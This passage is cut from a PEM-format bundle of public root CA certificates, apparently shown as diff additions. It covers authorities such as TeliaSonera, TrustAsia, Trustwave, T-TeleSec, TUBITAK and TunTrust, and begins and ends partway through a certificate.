+8rKJhGdEr7nv7ZbsnGTbMjBvZ5qsfl+yqwE2foH65IRe0qw24GtixX1LDoJt0nZi +0f6X+J8wfBj5tFJ3gh1229MdqfDBmgC9bXXYfef6xzijnHDoRnkDry5023X4blMM +A8iZGok1GTzTyVR8qPAs5m4HeW9q4ebqkYJpCh3DflminmtGFZhb069GHWLIzoBS +SRE/yQQSwxN8PzuKlts8oB4KtItUsiRnDe+Cy748fdHif64W1lZYudogsYMVoe+K +TTJvQS8TUoKU1xrBeKJR3Stwbbca+few4GeXVtt8YVMJAygCQMez2P2ccGrGKMOF +6eLtGpOg3kuYooQ+BXcBlj37tCAPnHICehIv1aO6UXivKitEZU61/Qrowc15h2Er +3oBXRb9n8ZuRXqWk7FlIEA04x7D6w0RtBPV4UBySllva9bguulvP5fBqnUsvWHMt +Ty3EHD70sz+rFQ47GUGKpMFXEmZxTPpT41frYpUJnlTd0cI8Vzy9OK2YZLe4A5pT +VmBds9hCG1xLEooc6+t9xnppxyd/pPiL8uSUZodL6ZQHCRJ5irLrdATczvREWeAW +ysUsWNc8e89ihmpQfTU2Zqf7N+cox9jQraVplI/owd8k+BsHMYeB2F326CjYSlKA +rBPuUBQemMc= +-----END CERTIFICATE----- + +# TeliaSonera Root CA v1 +-----BEGIN CERTIFICATE----- +MIIFODCCAyCgAwIBAgIRAJW+FqD3LkbxezmCcvqLzZYwDQYJKoZIhvcNAQEFBQAw +NzEUMBIGA1UECgwLVGVsaWFTb25lcmExHzAdBgNVBAMMFlRlbGlhU29uZXJhIFJv +b3QgQ0EgdjEwHhcNMDcxMDE4MTIwMDUwWhcNMzIxMDE4MTIwMDUwWjA3MRQwEgYD +VQQKDAtUZWxpYVNvbmVyYTEfMB0GA1UEAwwWVGVsaWFTb25lcmEgUm9vdCBDQSB2 +MTCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAMK+6yfwIaPzaSZVfp3F +VRaRXP3vIb9TgHot0pGMYzHw7CTww6XScnwQbfQ3t+XmfHnqjLWCi65ItqwA3GV1 +7CpNX8GH9SBlK4GoRz6JI5UwFpB/6FcHSOcZrr9FZ7E3GwYq/t75rH2D+1665I+X +Z75Ljo1kB1c4VWk0Nj0TSO9P4tNmHqTPGrdeNjPUtAa9GAH9d4RQAEX1jF3oI7x+ +/jXh7VB7qTCNGdMJjmhnXb88lxhTuylixcpecsHHltTbLaC0H2kD7OriUPEMPPCs +81Mt8Bz17Ww5OXOAFshSsCPN4D7c3TxHoLs1iuKYaIu+5b9y7tL6pe0S7fyYGKkm +dtwoSxAgHNN/Fnct7W+A90m7UwW7XWjH1Mh1Fj+JWov3F0fUTPHSiXk+TT2YqGHe +Oh7S+F4D4MHJHIzTjU3TlTazN19jY5szFPAtJmtTfImMMsJu7D0hADnJoWjiUIMu +sDor8zagrC/kb2HCUQk5PotTubtn2txTuXZZNp1D5SDgPTJghSJRt8czu90VL6R4 +pgd7gUY2BIbdeTXHlSw7sKMXNeVzH7RcWe/a6hBle3rQf5+ztCo3O3CLm1u5K7fs +slESl1MpWtTwEhDcTwK7EpIvYtQ/aUN8Ddb8WHUBiJ1YFkveupD/RwGJBmr2X7KQ +arMCpgKIv7NHfirZ1fpoeDVNAgMBAAGjPzA9MA8GA1UdEwEB/wQFMAMBAf8wCwYD +VR0PBAQDAgEGMB0GA1UdDgQWBBTwj1k4ALP1j5qWDNXr+nuqF+gTEjANBgkqhkiG +9w0BAQUFAAOCAgEAvuRcYk4k9AwI//DTDGjkk0kiP0Qnb7tt3oNmzqjMDfz1mgbl +dxSR651Be5kqhOX//CHBXfDkH1e3damhXwIm/9fH907eT/j3HEbAek9ALCI18Bmx +0GtnLLCo4MBANzX2hFxc469CeP6nyQ1Q6g2EdvZR74NTxnr/DlZJLo961gzmJ1Tj +TQpgcmLNkQfWpb/ImWvtxBnmq0wROMVvMeJuScg/doAmAyYp4Db29iBT4xdwNBed +Y2gea+zDTYa4EzAvXUYNR0PVG6pZDrlcjQZIrXSHX8f8MVRBE+LHIQ6e4B4N4cB7 +Q4WQxYpYxmUKeFfyxiMPAdkgS94P+5KFdSpcc41teyWRyu5FrgZLAMzTsVlQ2jqI +OylDRl6XK1TOU2+NSueW+r9xDkKLfP0ooNBIytrEgUy7onOTJsjrDNYmiLbAJM+7 +vVvrdX3pCI6GMyx5dwlppYn8s3CQh3aP0yK7Qs69cwsgJirQmz1wHiRszYd2qReW +t88NkvuOGKmYSdGe/mBEciG5Ge3C9THxOUiIkCR1VBatzvT4aRRkOfujuLpwQMcn +HL/EVlP6Y2XQ8xwOFvVrhlhNGNTkDY6lnVuR3HYkUD/GKvvZt5y11ubQ2egZixVx +SK236thZiNSQvxaz2emsWWFUyBy6ysHK4bkgTI86k4mloMy/0/Z1pHWWbVY= +-----END CERTIFICATE----- + +# TrustAsia Global Root CA G3 +-----BEGIN CERTIFICATE----- +MIIFpTCCA42gAwIBAgIUZPYOZXdhaqs7tOqFhLuxibhxkw8wDQYJKoZIhvcNAQEM +BQAwWjELMAkGA1UEBhMCQ04xJTAjBgNVBAoMHFRydXN0QXNpYSBUZWNobm9sb2dp +ZXMsIEluYy4xJDAiBgNVBAMMG1RydXN0QXNpYSBHbG9iYWwgUm9vdCBDQSBHMzAe +Fw0yMTA1MjAwMjEwMTlaFw00NjA1MTkwMjEwMTlaMFoxCzAJBgNVBAYTAkNOMSUw +IwYDVQQKDBxUcnVzdEFzaWEgVGVjaG5vbG9naWVzLCBJbmMuMSQwIgYDVQQDDBtU +cnVzdEFzaWEgR2xvYmFsIFJvb3QgQ0EgRzMwggIiMA0GCSqGSIb3DQEBAQUAA4IC +DwAwggIKAoICAQDAMYJhkuSUGwoqZdC+BqmHO1ES6nBBruL7dOoKjbmzTNyPtxNS +T1QY4SxzlZHFZjtqz6xjbYdT8PfxObegQ2OwxANdV6nnRM7EoYNl9lA+sX4WuDqK +AtCWHwDNBSHvBm3dIZwZQ0WhxeiAysKtQGIXBsaqvPPW5vxQfmZCHzyLpnl5hkA1 +nyDvP+uLRx+PjsXUjrYsyUQE49RDdT/VP68czH5GX6zfZBCK70bwkPAPLfSIC7Ep +qq+FqklYqL9joDiR5rPmd2jE+SoZhLsO4fWvieylL1AgdB4SQXMeJNnKziyhWTXA +yB1GJ2Faj/lN03J5Zh6fFZAhLf3ti1ZwA0pJPn9pMRJpxx5cynoTi+jm9WAPzJMs +hH/x/Gr8m0ed262IPfN2dTPXS6TIi/n1Q1hPy8gDVI+lhXgEGvNz8teHHUGf59gX +zhqcD0r83ERoVGjiQTz+LISGNzzNPy+i2+f3VANfWdP3kXjHi3dqFuVJhZBFcnAv +kV34PmVACxmZySYgWmjBNb9Pp1Hx2BErW+Canig7CjoKH8GB5S7wprlppYiU5msT +f9FkPz2ccEblooV7WIQn3MSAPmeamseaMQ4w7OYXQJXZRe0Blqq/DPNL0WP3E1jA +uPP6Z92bfW1K/zJMtSU7/xxnD4UiWQWRkUF3gdCFTIcQcf+eQxuulXUtgQIDAQAB +o2MwYTAPBgNVHRMBAf8EBTADAQH/MB8GA1UdIwQYMBaAFEDk5PIj7zjKsK5Xf/Ih +MBY027ySMB0GA1UdDgQWBBRA5OTyI+84yrCuV3/yITAWNNu8kjAOBgNVHQ8BAf8E +BAMCAQYwDQYJKoZIhvcNAQEMBQADggIBACY7UeFNOPMyGLS0XuFlXsSUT9SnYaP4 +wM8zAQLpw6o1D/GUE3d3NZ4tVlFEbuHGLige/9rsR82XRBf34EzC4Xx8MnpmyFq2 +XFNFV1pF1AWZLy4jVe5jaN/TG3inEpQGAHUNcoTpLrxaatXeL1nHo+zSh2bbt1S1 +JKv0Q3jbSwTEb93mPmY+KfJLaHEih6D4sTNjduMNhXJEIlU/HHzp/LgV6FL6qj6j +ITk1dImmasI5+njPtqzn59ZW/yOSLlALqbUHM/Q4X6RJpstlcHboCoWASzY9M/eV +VHUl2qzEc4Jl6VL1XP04lQJqaTDFHApXB64ipCz5xUG3uOyfT0gA+QEEVcys+TIx +xHWVBqB/0Y0n3bOppHKH/lmLmnp0Ft0WpWIp6zqW3IunaFnT63eROfjXy9mPX1on +AX1daBli2MjN9LdyR75bl87yraKZk62Uy5P2EgmVtqvXO9A/EcswFi55gORngS1d +7XB4tmBZrOFdRWOPyN9yaFvqHbgB8X7754qz41SgOAngPN5C8sLtLpvzHzW2Ntjj +gKGLzZlkD8Kqq7HK9W+eQ42EVJmzbsASZthwEPEGNTNDqJwuuhQxzhB/HIbjj9LV ++Hfsm6vxL2PZQl/gZ4FkkfGXL/xuJvYz+NO1+MRiqzFRJQJ6+N1rZdVtTTDIZbpo +FGWsJwt0ivKH +-----END CERTIFICATE----- + +# TrustAsia Global Root CA G4 +-----BEGIN CERTIFICATE----- +MIICVTCCAdygAwIBAgIUTyNkuI6XY57GU4HBdk7LKnQV1tcwCgYIKoZIzj0EAwMw +WjELMAkGA1UEBhMCQ04xJTAjBgNVBAoMHFRydXN0QXNpYSBUZWNobm9sb2dpZXMs +IEluYy4xJDAiBgNVBAMMG1RydXN0QXNpYSBHbG9iYWwgUm9vdCBDQSBHNDAeFw0y +MTA1MjAwMjEwMjJaFw00NjA1MTkwMjEwMjJaMFoxCzAJBgNVBAYTAkNOMSUwIwYD +VQQKDBxUcnVzdEFzaWEgVGVjaG5vbG9naWVzLCBJbmMuMSQwIgYDVQQDDBtUcnVz +dEFzaWEgR2xvYmFsIFJvb3QgQ0EgRzQwdjAQBgcqhkjOPQIBBgUrgQQAIgNiAATx +s8045CVD5d4ZCbuBeaIVXxVjAd7Cq92zphtnS4CDr5nLrBfbK5bKfFJV4hrhPVbw +LxYI+hW8m7tH5j/uqOFMjPXTNvk4XatwmkcN4oFBButJ+bAp3TPsUKV/eSm4IJij +YzBhMA8GA1UdEwEB/wQFMAMBAf8wHwYDVR0jBBgwFoAUpbtKl86zK3+kMd6Xg1mD +pm9xy94wHQYDVR0OBBYEFKW7SpfOsyt/pDHel4NZg6ZvccveMA4GA1UdDwEB/wQE +AwIBBjAKBggqhkjOPQQDAwNnADBkAjBe8usGzEkxn0AAbbd+NvBNEU/zy4k6LHiR +UKNbwMp1JvK/kF0LgoxgKJ/GcJpo5PECMFxYDlZ2z1jD1xCMuo6u47xkdUfFVZDj +/bpV6wfEU6s3qe4hsiFbYI89MvHVI5TWWA== +-----END CERTIFICATE----- + +# Trustwave Global Certification Authority +-----BEGIN CERTIFICATE----- +MIIF2jCCA8KgAwIBAgIMBfcOhtpJ80Y1LrqyMA0GCSqGSIb3DQEBCwUAMIGIMQsw +CQYDVQQGEwJVUzERMA8GA1UECAwISWxsaW5vaXMxEDAOBgNVBAcMB0NoaWNhZ28x +ITAfBgNVBAoMGFRydXN0d2F2ZSBIb2xkaW5ncywgSW5jLjExMC8GA1UEAwwoVHJ1 +c3R3YXZlIEdsb2JhbCBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eTAeFw0xNzA4MjMx +OTM0MTJaFw00MjA4MjMxOTM0MTJaMIGIMQswCQYDVQQGEwJVUzERMA8GA1UECAwI +SWxsaW5vaXMxEDAOBgNVBAcMB0NoaWNhZ28xITAfBgNVBAoMGFRydXN0d2F2ZSBI +b2xkaW5ncywgSW5jLjExMC8GA1UEAwwoVHJ1c3R3YXZlIEdsb2JhbCBDZXJ0aWZp +Y2F0aW9uIEF1dGhvcml0eTCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIB +ALldUShLPDeS0YLOvR29zd24q88KPuFd5dyqCblXAj7mY2Hf8g+CY66j96xz0Xzn +swuvCAAJWX/NKSqIk4cXGIDtiLK0thAfLdZfVaITXdHG6wZWiYj+rDKd/VzDBcdu +7oaJuogDnXIhhpCujwOl3J+IKMujkkkP7NAP4m1ET4BqstTnoApTAbqOl5F2brz8 +1Ws25kCI1nsvXwXoLG0R8+eyvpJETNKXpP7ScoFDB5zpET71ixpZfR9oWN0EACyW +80OzfpgZdNmcc9kYvkHHNHnZ9GLCQ7mzJ7Aiy/k9UscwR7PJPrhq4ufogXBeQotP +JqX+OsIgbrv4Fo7NDKm0G2x2EOFYeUY+VM6AqFcJNykbmROPDMjWLBz7BegIlT1l +RtzuzWniTY+HKE40Cz7PFNm73bZQmq131BnW2hqIyE4bJ3XYsgjxroMwuREOzYfw +hI0Vcnyh78zyiGG69Gm7DIwLdVcEuE4qFC49DxweMqZiNu5m4iK4BUBjECLzMx10 +coos9TkpoNPnG4CELcU9402x/RpvumUHO1jsQkUm+9jaJXLE9gCxInm943xZYkqc +BW89zubWR2OZxiRvchLIrH+QtAuRcOi35hYQcRfO3gZPSEF9NUqjifLJS3tBEW1n +twiYTOURGa5CgNz7kAXU+FDKvuStx8KU1xad5hePrzb7AgMBAAGjQjBAMA8GA1Ud +EwEB/wQFMAMBAf8wHQYDVR0OBBYEFJngGWcNYtt2s9o9uFvo/ULSMQ6HMA4GA1Ud +DwEB/wQEAwIBBjANBgkqhkiG9w0BAQsFAAOCAgEAmHNw4rDT7TnsTGDZqRKGFx6W +0OhUKDtkLSGm+J1WE2pIPU/HPinbbViDVD2HfSMF1OQc3Og4ZYbFdada2zUFvXfe +uyk3QAUHw5RSn8pk3fEbK9xGChACMf1KaA0HZJDmHvUqoai7PF35owgLEQzxPy0Q +lG/+4jSHg9bP5Rs1bdID4bANqKCqRieCNqcVtgimQlRXtpla4gt5kNdXElE1GYhB +aCXUNxeEFfsBctyV3lImIJgm4nb1J2/6ADtKYdkNy1GTKv0WBpanI5ojSP5RvbbE +sLFUzt5sQa0WZ37b/TjNuThOssFgy50X31ieemKyJo90lZvkWx3SD92YHJtZuSPT +MaCm/zjdzyBP6VhWOmfD0faZmZ26NraAL4hHT4a/RDqA5Dccprrql5gR0IRiR2Qe +qu5AvzSxnI9O4fKSTx+O856X3vOmeWqJcU9LJxdI/uz0UA9PSX3MReO9ekDFQdxh +VicGaeVyQYHTtgGJoC86cnn+OjC/QezHYj6RS8fZMXZC+fc8Y+wmjHMMfRod6qh8 +h6jCJ3zhM0EPz8/8AKAigJ5Kp28AsEFFtyLKaEjFQqKu3R3y4G5OBVixwJAWKqQ9 +EEC+j2Jjg6mcgn0tAumDMHzLJ8n9HmYAsC7TIS+OMxZsmO0QqAfWzJPP29FpHOTK +yeC2nOnOcXHebD8WpHk= +-----END CERTIFICATE----- + +# Trustwave Global ECC P256 Certification Authority +-----BEGIN CERTIFICATE----- +MIICYDCCAgegAwIBAgIMDWpfCD8oXD5Rld9dMAoGCCqGSM49BAMCMIGRMQswCQYD +VQQGEwJVUzERMA8GA1UECBMISWxsaW5vaXMxEDAOBgNVBAcTB0NoaWNhZ28xITAf +BgNVBAoTGFRydXN0d2F2ZSBIb2xkaW5ncywgSW5jLjE6MDgGA1UEAxMxVHJ1c3R3 +YXZlIEdsb2JhbCBFQ0MgUDI1NiBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eTAeFw0x +NzA4MjMxOTM1MTBaFw00MjA4MjMxOTM1MTBaMIGRMQswCQYDVQQGEwJVUzERMA8G +A1UECBMISWxsaW5vaXMxEDAOBgNVBAcTB0NoaWNhZ28xITAfBgNVBAoTGFRydXN0 +d2F2ZSBIb2xkaW5ncywgSW5jLjE6MDgGA1UEAxMxVHJ1c3R3YXZlIEdsb2JhbCBF +Q0MgUDI1NiBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eTBZMBMGByqGSM49AgEGCCqG +SM49AwEHA0IABH77bOYj43MyCMpg5lOcunSNGLB4kFKA3TjASh3RqMyTpJcGOMoN +FWLGjgEqZZ2q3zSRLoHB5DOSMcT9CTqmP62jQzBBMA8GA1UdEwEB/wQFMAMBAf8w +DwYDVR0PAQH/BAUDAwcGADAdBgNVHQ4EFgQUo0EGrJBt0UrrdaVKEJmzsaGLSvcw +CgYIKoZIzj0EAwIDRwAwRAIgB+ZU2g6gWrKuEZ+Hxbb/ad4lvvigtwjzRM4q3wgh +DDcCIC0mA6AFvWvR9lz4ZcyGbbOcNEhjhAnFjXca4syc4XR7 +-----END CERTIFICATE----- + +# Trustwave Global ECC P384 Certification Authority +-----BEGIN CERTIFICATE----- +MIICnTCCAiSgAwIBAgIMCL2Fl2yZJ6SAaEc7MAoGCCqGSM49BAMDMIGRMQswCQYD +VQQGEwJVUzERMA8GA1UECBMISWxsaW5vaXMxEDAOBgNVBAcTB0NoaWNhZ28xITAf +BgNVBAoTGFRydXN0d2F2ZSBIb2xkaW5ncywgSW5jLjE6MDgGA1UEAxMxVHJ1c3R3 +YXZlIEdsb2JhbCBFQ0MgUDM4NCBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eTAeFw0x +NzA4MjMxOTM2NDNaFw00MjA4MjMxOTM2NDNaMIGRMQswCQYDVQQGEwJVUzERMA8G +A1UECBMISWxsaW5vaXMxEDAOBgNVBAcTB0NoaWNhZ28xITAfBgNVBAoTGFRydXN0 +d2F2ZSBIb2xkaW5ncywgSW5jLjE6MDgGA1UEAxMxVHJ1c3R3YXZlIEdsb2JhbCBF +Q0MgUDM4NCBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eTB2MBAGByqGSM49AgEGBSuB +BAAiA2IABGvaDXU1CDFHBa5FmVXxERMuSvgQMSOjfoPTfygIOiYaOs+Xgh+AtycJ +j9GOMMQKmw6sWASr9zZ9lCOkmwqKi6vr/TklZvFe/oyujUF5nQlgziip04pt89ZF +1PKYhDhloKNDMEEwDwYDVR0TAQH/BAUwAwEB/zAPBgNVHQ8BAf8EBQMDBwYAMB0G +A1UdDgQWBBRVqYSJ0sEyvRjLbKYHTsjnnb6CkDAKBggqhkjOPQQDAwNnADBkAjA3 +AZKXRRJ+oPM+rRk6ct30UJMDEr5E0k9BpIycnR+j9sKS50gU/k6bpZFXrsY3crsC +MGclCrEMXu6pY5Jv5ZAL/mYiykf9ijH3g/56vxC+GCsej/YpHpRZ744hN8tRmKVu +Sw== +-----END CERTIFICATE----- + +# T-TeleSec GlobalRoot Class 2 +-----BEGIN CERTIFICATE----- +MIIDwzCCAqugAwIBAgIBATANBgkqhkiG9w0BAQsFADCBgjELMAkGA1UEBhMCREUx +KzApBgNVBAoMIlQtU3lzdGVtcyBFbnRlcnByaXNlIFNlcnZpY2VzIEdtYkgxHzAd +BgNVBAsMFlQtU3lzdGVtcyBUcnVzdCBDZW50ZXIxJTAjBgNVBAMMHFQtVGVsZVNl +YyBHbG9iYWxSb290IENsYXNzIDIwHhcNMDgxMDAxMTA0MDE0WhcNMzMxMDAxMjM1 +OTU5WjCBgjELMAkGA1UEBhMCREUxKzApBgNVBAoMIlQtU3lzdGVtcyBFbnRlcnBy +aXNlIFNlcnZpY2VzIEdtYkgxHzAdBgNVBAsMFlQtU3lzdGVtcyBUcnVzdCBDZW50 +ZXIxJTAjBgNVBAMMHFQtVGVsZVNlYyBHbG9iYWxSb290IENsYXNzIDIwggEiMA0G +CSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQCqX9obX+hzkeXaXPSi5kfl82hVYAUd +AqSzm1nzHoqvNK38DcLZSBnuaY/JIPwhqgcZ7bBcrGXHX+0CfHt8LRvWurmAwhiC +FoT6ZrAIxlQjgeTNuUk/9k9uN0goOA/FvudocP05l03Sx5iRUKrERLMjfTlH6VJi +1hKTXrcxlkIF+3anHqP1wvzpesVsqXFP6st4vGCvx9702cu+fjOlbpSD8DT6Iavq +jnKgP6TeMFvvhk1qlVtDRKgQFRzlAVfFmPHmBiiRqiDFt1MmUUOyCxGVWOHAD3bZ +wI18gfNycJ5v/hqO2V81xrJvNHy+SE/iWjnX2J14np+GPgNeGYtEotXHAgMBAAGj +QjBAMA8GA1UdEwEB/wQFMAMBAf8wDgYDVR0PAQH/BAQDAgEGMB0GA1UdDgQWBBS/ +WSA2AHmgoCJrjNXyYdK4LMuCSjANBgkqhkiG9w0BAQsFAAOCAQEAMQOiYQsfdOhy +NsZt+U2e+iKo4YFWz827n+qrkRk4r6p8FU3ztqONpfSO9kSpp+ghla0+AGIWiPAC +uvxhI+YzmzB6azZie60EI4RYZeLbK4rnJVM3YlNfvNoBYimipidx5joifsFvHZVw +IEoHNN/q/xWA5brXethbdXwFeilHfkCoMRN3zUA7tFFHei4R40cR3p1m0IvVVGb6 +g1XqfMIpiRvpb7PO4gWEyS8+eIVibslfwXhjdFjASBgMmTnrpMwatXlajRWc2BQN +9noHV8cigwUtPJslJj0Ys6lDfMjIq2SPDqO/nBudMNva0Bkuqjzx+zOAduTNrRlP +BSeOE6Fuwg== +-----END CERTIFICATE----- + +# T-TeleSec GlobalRoot Class 3 +-----BEGIN CERTIFICATE----- +MIIDwzCCAqugAwIBAgIBATANBgkqhkiG9w0BAQsFADCBgjELMAkGA1UEBhMCREUx +KzApBgNVBAoMIlQtU3lzdGVtcyBFbnRlcnByaXNlIFNlcnZpY2VzIEdtYkgxHzAd +BgNVBAsMFlQtU3lzdGVtcyBUcnVzdCBDZW50ZXIxJTAjBgNVBAMMHFQtVGVsZVNl +YyBHbG9iYWxSb290IENsYXNzIDMwHhcNMDgxMDAxMTAyOTU2WhcNMzMxMDAxMjM1 +OTU5WjCBgjELMAkGA1UEBhMCREUxKzApBgNVBAoMIlQtU3lzdGVtcyBFbnRlcnBy +aXNlIFNlcnZpY2VzIEdtYkgxHzAdBgNVBAsMFlQtU3lzdGVtcyBUcnVzdCBDZW50 +ZXIxJTAjBgNVBAMMHFQtVGVsZVNlYyBHbG9iYWxSb290IENsYXNzIDMwggEiMA0G +CSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQC9dZPwYiJvJK7genasfb3ZJNW4t/zN +8ELg63iIVl6bmlQdTQyK9tPPcPRStdiTBONGhnFBSivwKixVA9ZIw+A5OO3yXDw/ +RLyTPWGrTs0NvvAgJ1gORH8EGoel15YUNpDQSXuhdfsaa3Ox+M6pCSzyU9XDFES4 +hqX2iys52qMzVNn6chr3IhUciJFrf2blw2qAsCTz34ZFiP0Zf3WHHx+xGwpzJFu5 +ZeAsVMhg02YXP+HMVDNzkQI6pn97djmiH5a2OK61yJN0HZ65tOVgnS9W0eDrXltM +EnAMbEQgqxHY9Bn20pxSN+f6tsIxO0rUFJmtxxr1XV/6B7h8DR/Wgx6zAgMBAAGj +QjBAMA8GA1UdEwEB/wQFMAMBAf8wDgYDVR0PAQH/BAQDAgEGMB0GA1UdDgQWBBS1 +A/d2O2GCahKqGFPrAyGUv/7OyjANBgkqhkiG9w0BAQsFAAOCAQEAVj3vlNW92nOy +WL6ukK2YJ5f+AbGwUgC4TeQbIXQbfsDuXmkqJa9c1h3a0nnJ85cp4IaH3gRZD/FZ +1GSFS5mvJQQeyUapl96Cshtwn5z2r3Ex3XsFpSzTucpH9sry9uetuUg/vBa3wW30 +6gmv7PO15wWeph6KU1HWk4HMdJP2udqmJQV0eVp+QD6CSyYRMG7hP0HHRwA11fXT +91Q+gT3aSWqas+8QPebrb9HIIkfLzM8BMZLZGOMivgkeGj5asuRrDFR6fUNOuIml +e9eiPZaGzPImNC1qkp2aGtAw4l1OBLBfiyB+d8E9lYLRRpo7PHi4b6HQDWSieB4p +TpPDpFQUWw== +-----END CERTIFICATE----- + +# TUBITAK Kamu SM SSL Kok Sertifikasi - Surum 1 +-----BEGIN CERTIFICATE----- +MIIEYzCCA0ugAwIBAgIBATANBgkqhkiG9w0BAQsFADCB0jELMAkGA1UEBhMCVFIx +GDAWBgNVBAcTD0dlYnplIC0gS29jYWVsaTFCMEAGA1UEChM5VHVya2l5ZSBCaWxp +bXNlbCB2ZSBUZWtub2xvamlrIEFyYXN0aXJtYSBLdXJ1bXUgLSBUVUJJVEFLMS0w +KwYDVQQLEyRLYW11IFNlcnRpZmlrYXN5b24gTWVya2V6aSAtIEthbXUgU00xNjA0 +BgNVBAMTLVRVQklUQUsgS2FtdSBTTSBTU0wgS29rIFNlcnRpZmlrYXNpIC0gU3Vy +dW0gMTAeFw0xMzExMjUwODI1NTVaFw00MzEwMjUwODI1NTVaMIHSMQswCQYDVQQG +EwJUUjEYMBYGA1UEBxMPR2ViemUgLSBLb2NhZWxpMUIwQAYDVQQKEzlUdXJraXll +IEJpbGltc2VsIHZlIFRla25vbG9qaWsgQXJhc3Rpcm1hIEt1cnVtdSAtIFRVQklU +QUsxLTArBgNVBAsTJEthbXUgU2VydGlmaWthc3lvbiBNZXJrZXppIC0gS2FtdSBT +TTE2MDQGA1UEAxMtVFVCSVRBSyBLYW11IFNNIFNTTCBLb2sgU2VydGlmaWthc2kg +LSBTdXJ1bSAxMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAr3UwM6q7 +a9OZLBI3hNmNe5eA027n/5tQlT6QlVZC1xl8JoSNkvoBHToP4mQ4t4y86Ij5iySr +LqP1N+RAjhgleYN1Hzv/bKjFxlb4tO2KRKOrbEz8HdDc72i9z+SqzvBV96I01INr +N3wcwv61A+xXzry0tcXtAA9TNypN9E8Mg/uGz8v+jE69h/mniyFXnHrfA2eJLJ2X +YacQuFWQfw4tJzh03+f92k4S400VIgLI4OD8D62K18lUUMw7D8oWgITQUVbDjlZ/ +iSIzL+aFCr2lqBs23tPcLG07xxO9WSMs5uWk99gL7eqQQESolbuT1dCANLZGeA4f +AJNG4e7p+exPFwIDAQABo0IwQDAdBgNVHQ4EFgQUZT/HiobGPN08VFw1+DrtUgxH +V8gwDgYDVR0PAQH/BAQDAgEGMA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQEL +BQADggEBACo/4fEyjq7hmFxLXs9rHmoJ0iKpEsdeV31zVmSAhHqT5Am5EM2fKifh +AHe+SMg1qIGf5LgsyX8OsNJLN13qudULXjS99HMpw+0mFZx+CFOKWI3QSyjfwbPf +IPP54+M638yclNhOT8NrF7f3cuitZjO1JVOr4PhMqZ398g26rrnZqsZr+ZO7rqu4 +lzwDGrpDxpa5RXI4s6ehlj2Re37AIVNMh+3yC1SVUZPVIqUNivGTDj5UDrDYyU7c +8jEyVupk+eq1nRZmQnLzf9OxMUP8pI4X8W0jq5Rm+K37DwhuJi1/FwcJsoz7UMCf +lo3Ptv0AnVoUmr8CRPXBwp8iXqIPoeM= +-----END CERTIFICATE----- + +# TunTrust Root CA +-----BEGIN CERTIFICATE----- +MIIFszCCA5ugAwIBAgIUEwLV4kBMkkaGFmddtLu7sms+/BMwDQYJKoZIhvcNAQEL +BQAwYTELMAkGA1UEBhMCVE4xNzA1BgNVBAoMLkFnZW5jZSBOYXRpb25hbGUgZGUg +Q2VydGlmaWNhdGlvbiBFbGVjdHJvbmlxdWUxGTAXBgNVBAMMEFR1blRydXN0IFJv +b3QgQ0EwHhcNMTkwNDI2MDg1NzU2WhcNNDQwNDI2MDg1NzU2WjBhMQswCQYDVQQG +EwJUTjE3MDUGA1UECgwuQWdlbmNlIE5hdGlvbmFsZSBkZSBDZXJ0aWZpY2F0aW9u +IEVsZWN0cm9uaXF1ZTEZMBcGA1UEAwwQVHVuVHJ1c3QgUm9vdCBDQTCCAiIwDQYJ +KoZIhvcNAQEBBQADggIPADCCAgoCggIBAMPN0/y9BFPdDCA61YguBUtB9YOCfvdZ +n56eY+hz2vYGqU8ftPkLHzmMmiDQfgbU7DTZhrx1W4eI8NLZ1KMKsmwb60ksPqxd +2JQDoOw05TDENX37Jk0bbjBU2PWARZw5rZzJJQRNmpA+TkBuimvNKWfGzC3gdOgF +VwpIUPp6Q9p+7FuaDmJ2/uqdHYVy7BG7NegfJ7/Boce7SBbdVtfMTqDhuazb1YMZ +GoXRlJfXyqNlC/M4+QKu3fZnz8k/9YosRxqZbwUN/dAdgjH8KcwAWJeRTIAAHDOF +li/LQcKLEITDCSSJH7UP2dl3RxiSlGBcx5kDPP73lad9UKGAwqmDrViWVSHbhlnU +r8a83YFuB9tgYv7sEG7aaAH0gxupPqJbI9dkxt/con3YS7qC0lH4Zr8GRuR5KiY2 +eY8fTpkdso8MDhz/yV3A/ZAQprE38806JG60hZC/gLkMjNWb1sjxVj8agIl6qeIb +MlEsPvLfe/ZdeikZjuXIvTZxi11Mwh0/rViizz1wTaZQmCXcI/m4WEEIcb9PuISg +jwBUFfyRbVinljvrS5YnzWuioYasDXxU5mZMZl+QviGaAkYt5IPCgLnPSz7ofzwB +7I9ezX/SKEIBlYrilz0QIX32nRzFNKHsLA4KUiwSVXAkPcvCFDVDXSdOvsC9qnyW +5/yeYa1E0wCXAgMBAAGjYzBhMB0GA1UdDgQWBBQGmpsfU33x9aTI04Y+oXNZtPdE +ITAPBgNVHRMBAf8EBTADAQH/MB8GA1UdIwQYMBaAFAaamx9TffH1pMjThj6hc1m0 +90QhMA4GA1UdDwEB/wQEAwIBBjANBgkqhkiG9w0BAQsFAAOCAgEAqgVutt0Vyb+z +xiD2BkewhpMl0425yAA/l/VSJ4hxyXT968pk21vvHl26v9Hr7lxpuhbI87mP0zYu +QEkHDVneixCwSQXi/5E/S7fdAo74gShczNxtr18UnH1YeA32gAm56Q6XKRm4t+v4 +FstVEuTGfbvE7Pi1HE4+Z7/FXxttbUcoqgRYYdZ2vyJ/0Adqp2RT8JeNnYA/u8EH +22Wv5psymsNUk8QcCMNE+3tjEUPRahphanltkE8pjkcFwRJpadbGNjHh/PqAulxP +xOu3Mqz4dWEX1xAZufHSCe96Qp1bWgvUxpVOKs7/B9dPfhgGiPEZtdmYu65xxBzn +dFlY7wyJz4sfdZMaBBSSSFCp61cpABbjNhzI+L/wM9VBD8TMPN3pM0MBkRArHtG5 +Xc0yGYuPjCB31yLEQtyEFpslbei0VXF/sHyz03FJuc9SpAQ/3D2gu68zngowYI7b +nV2UqL1g52KAdoGDDIzMMEZJ4gzSqK/rYXHv5yJiqfdcZGyfFoxnNidF9Ql7v/YQ 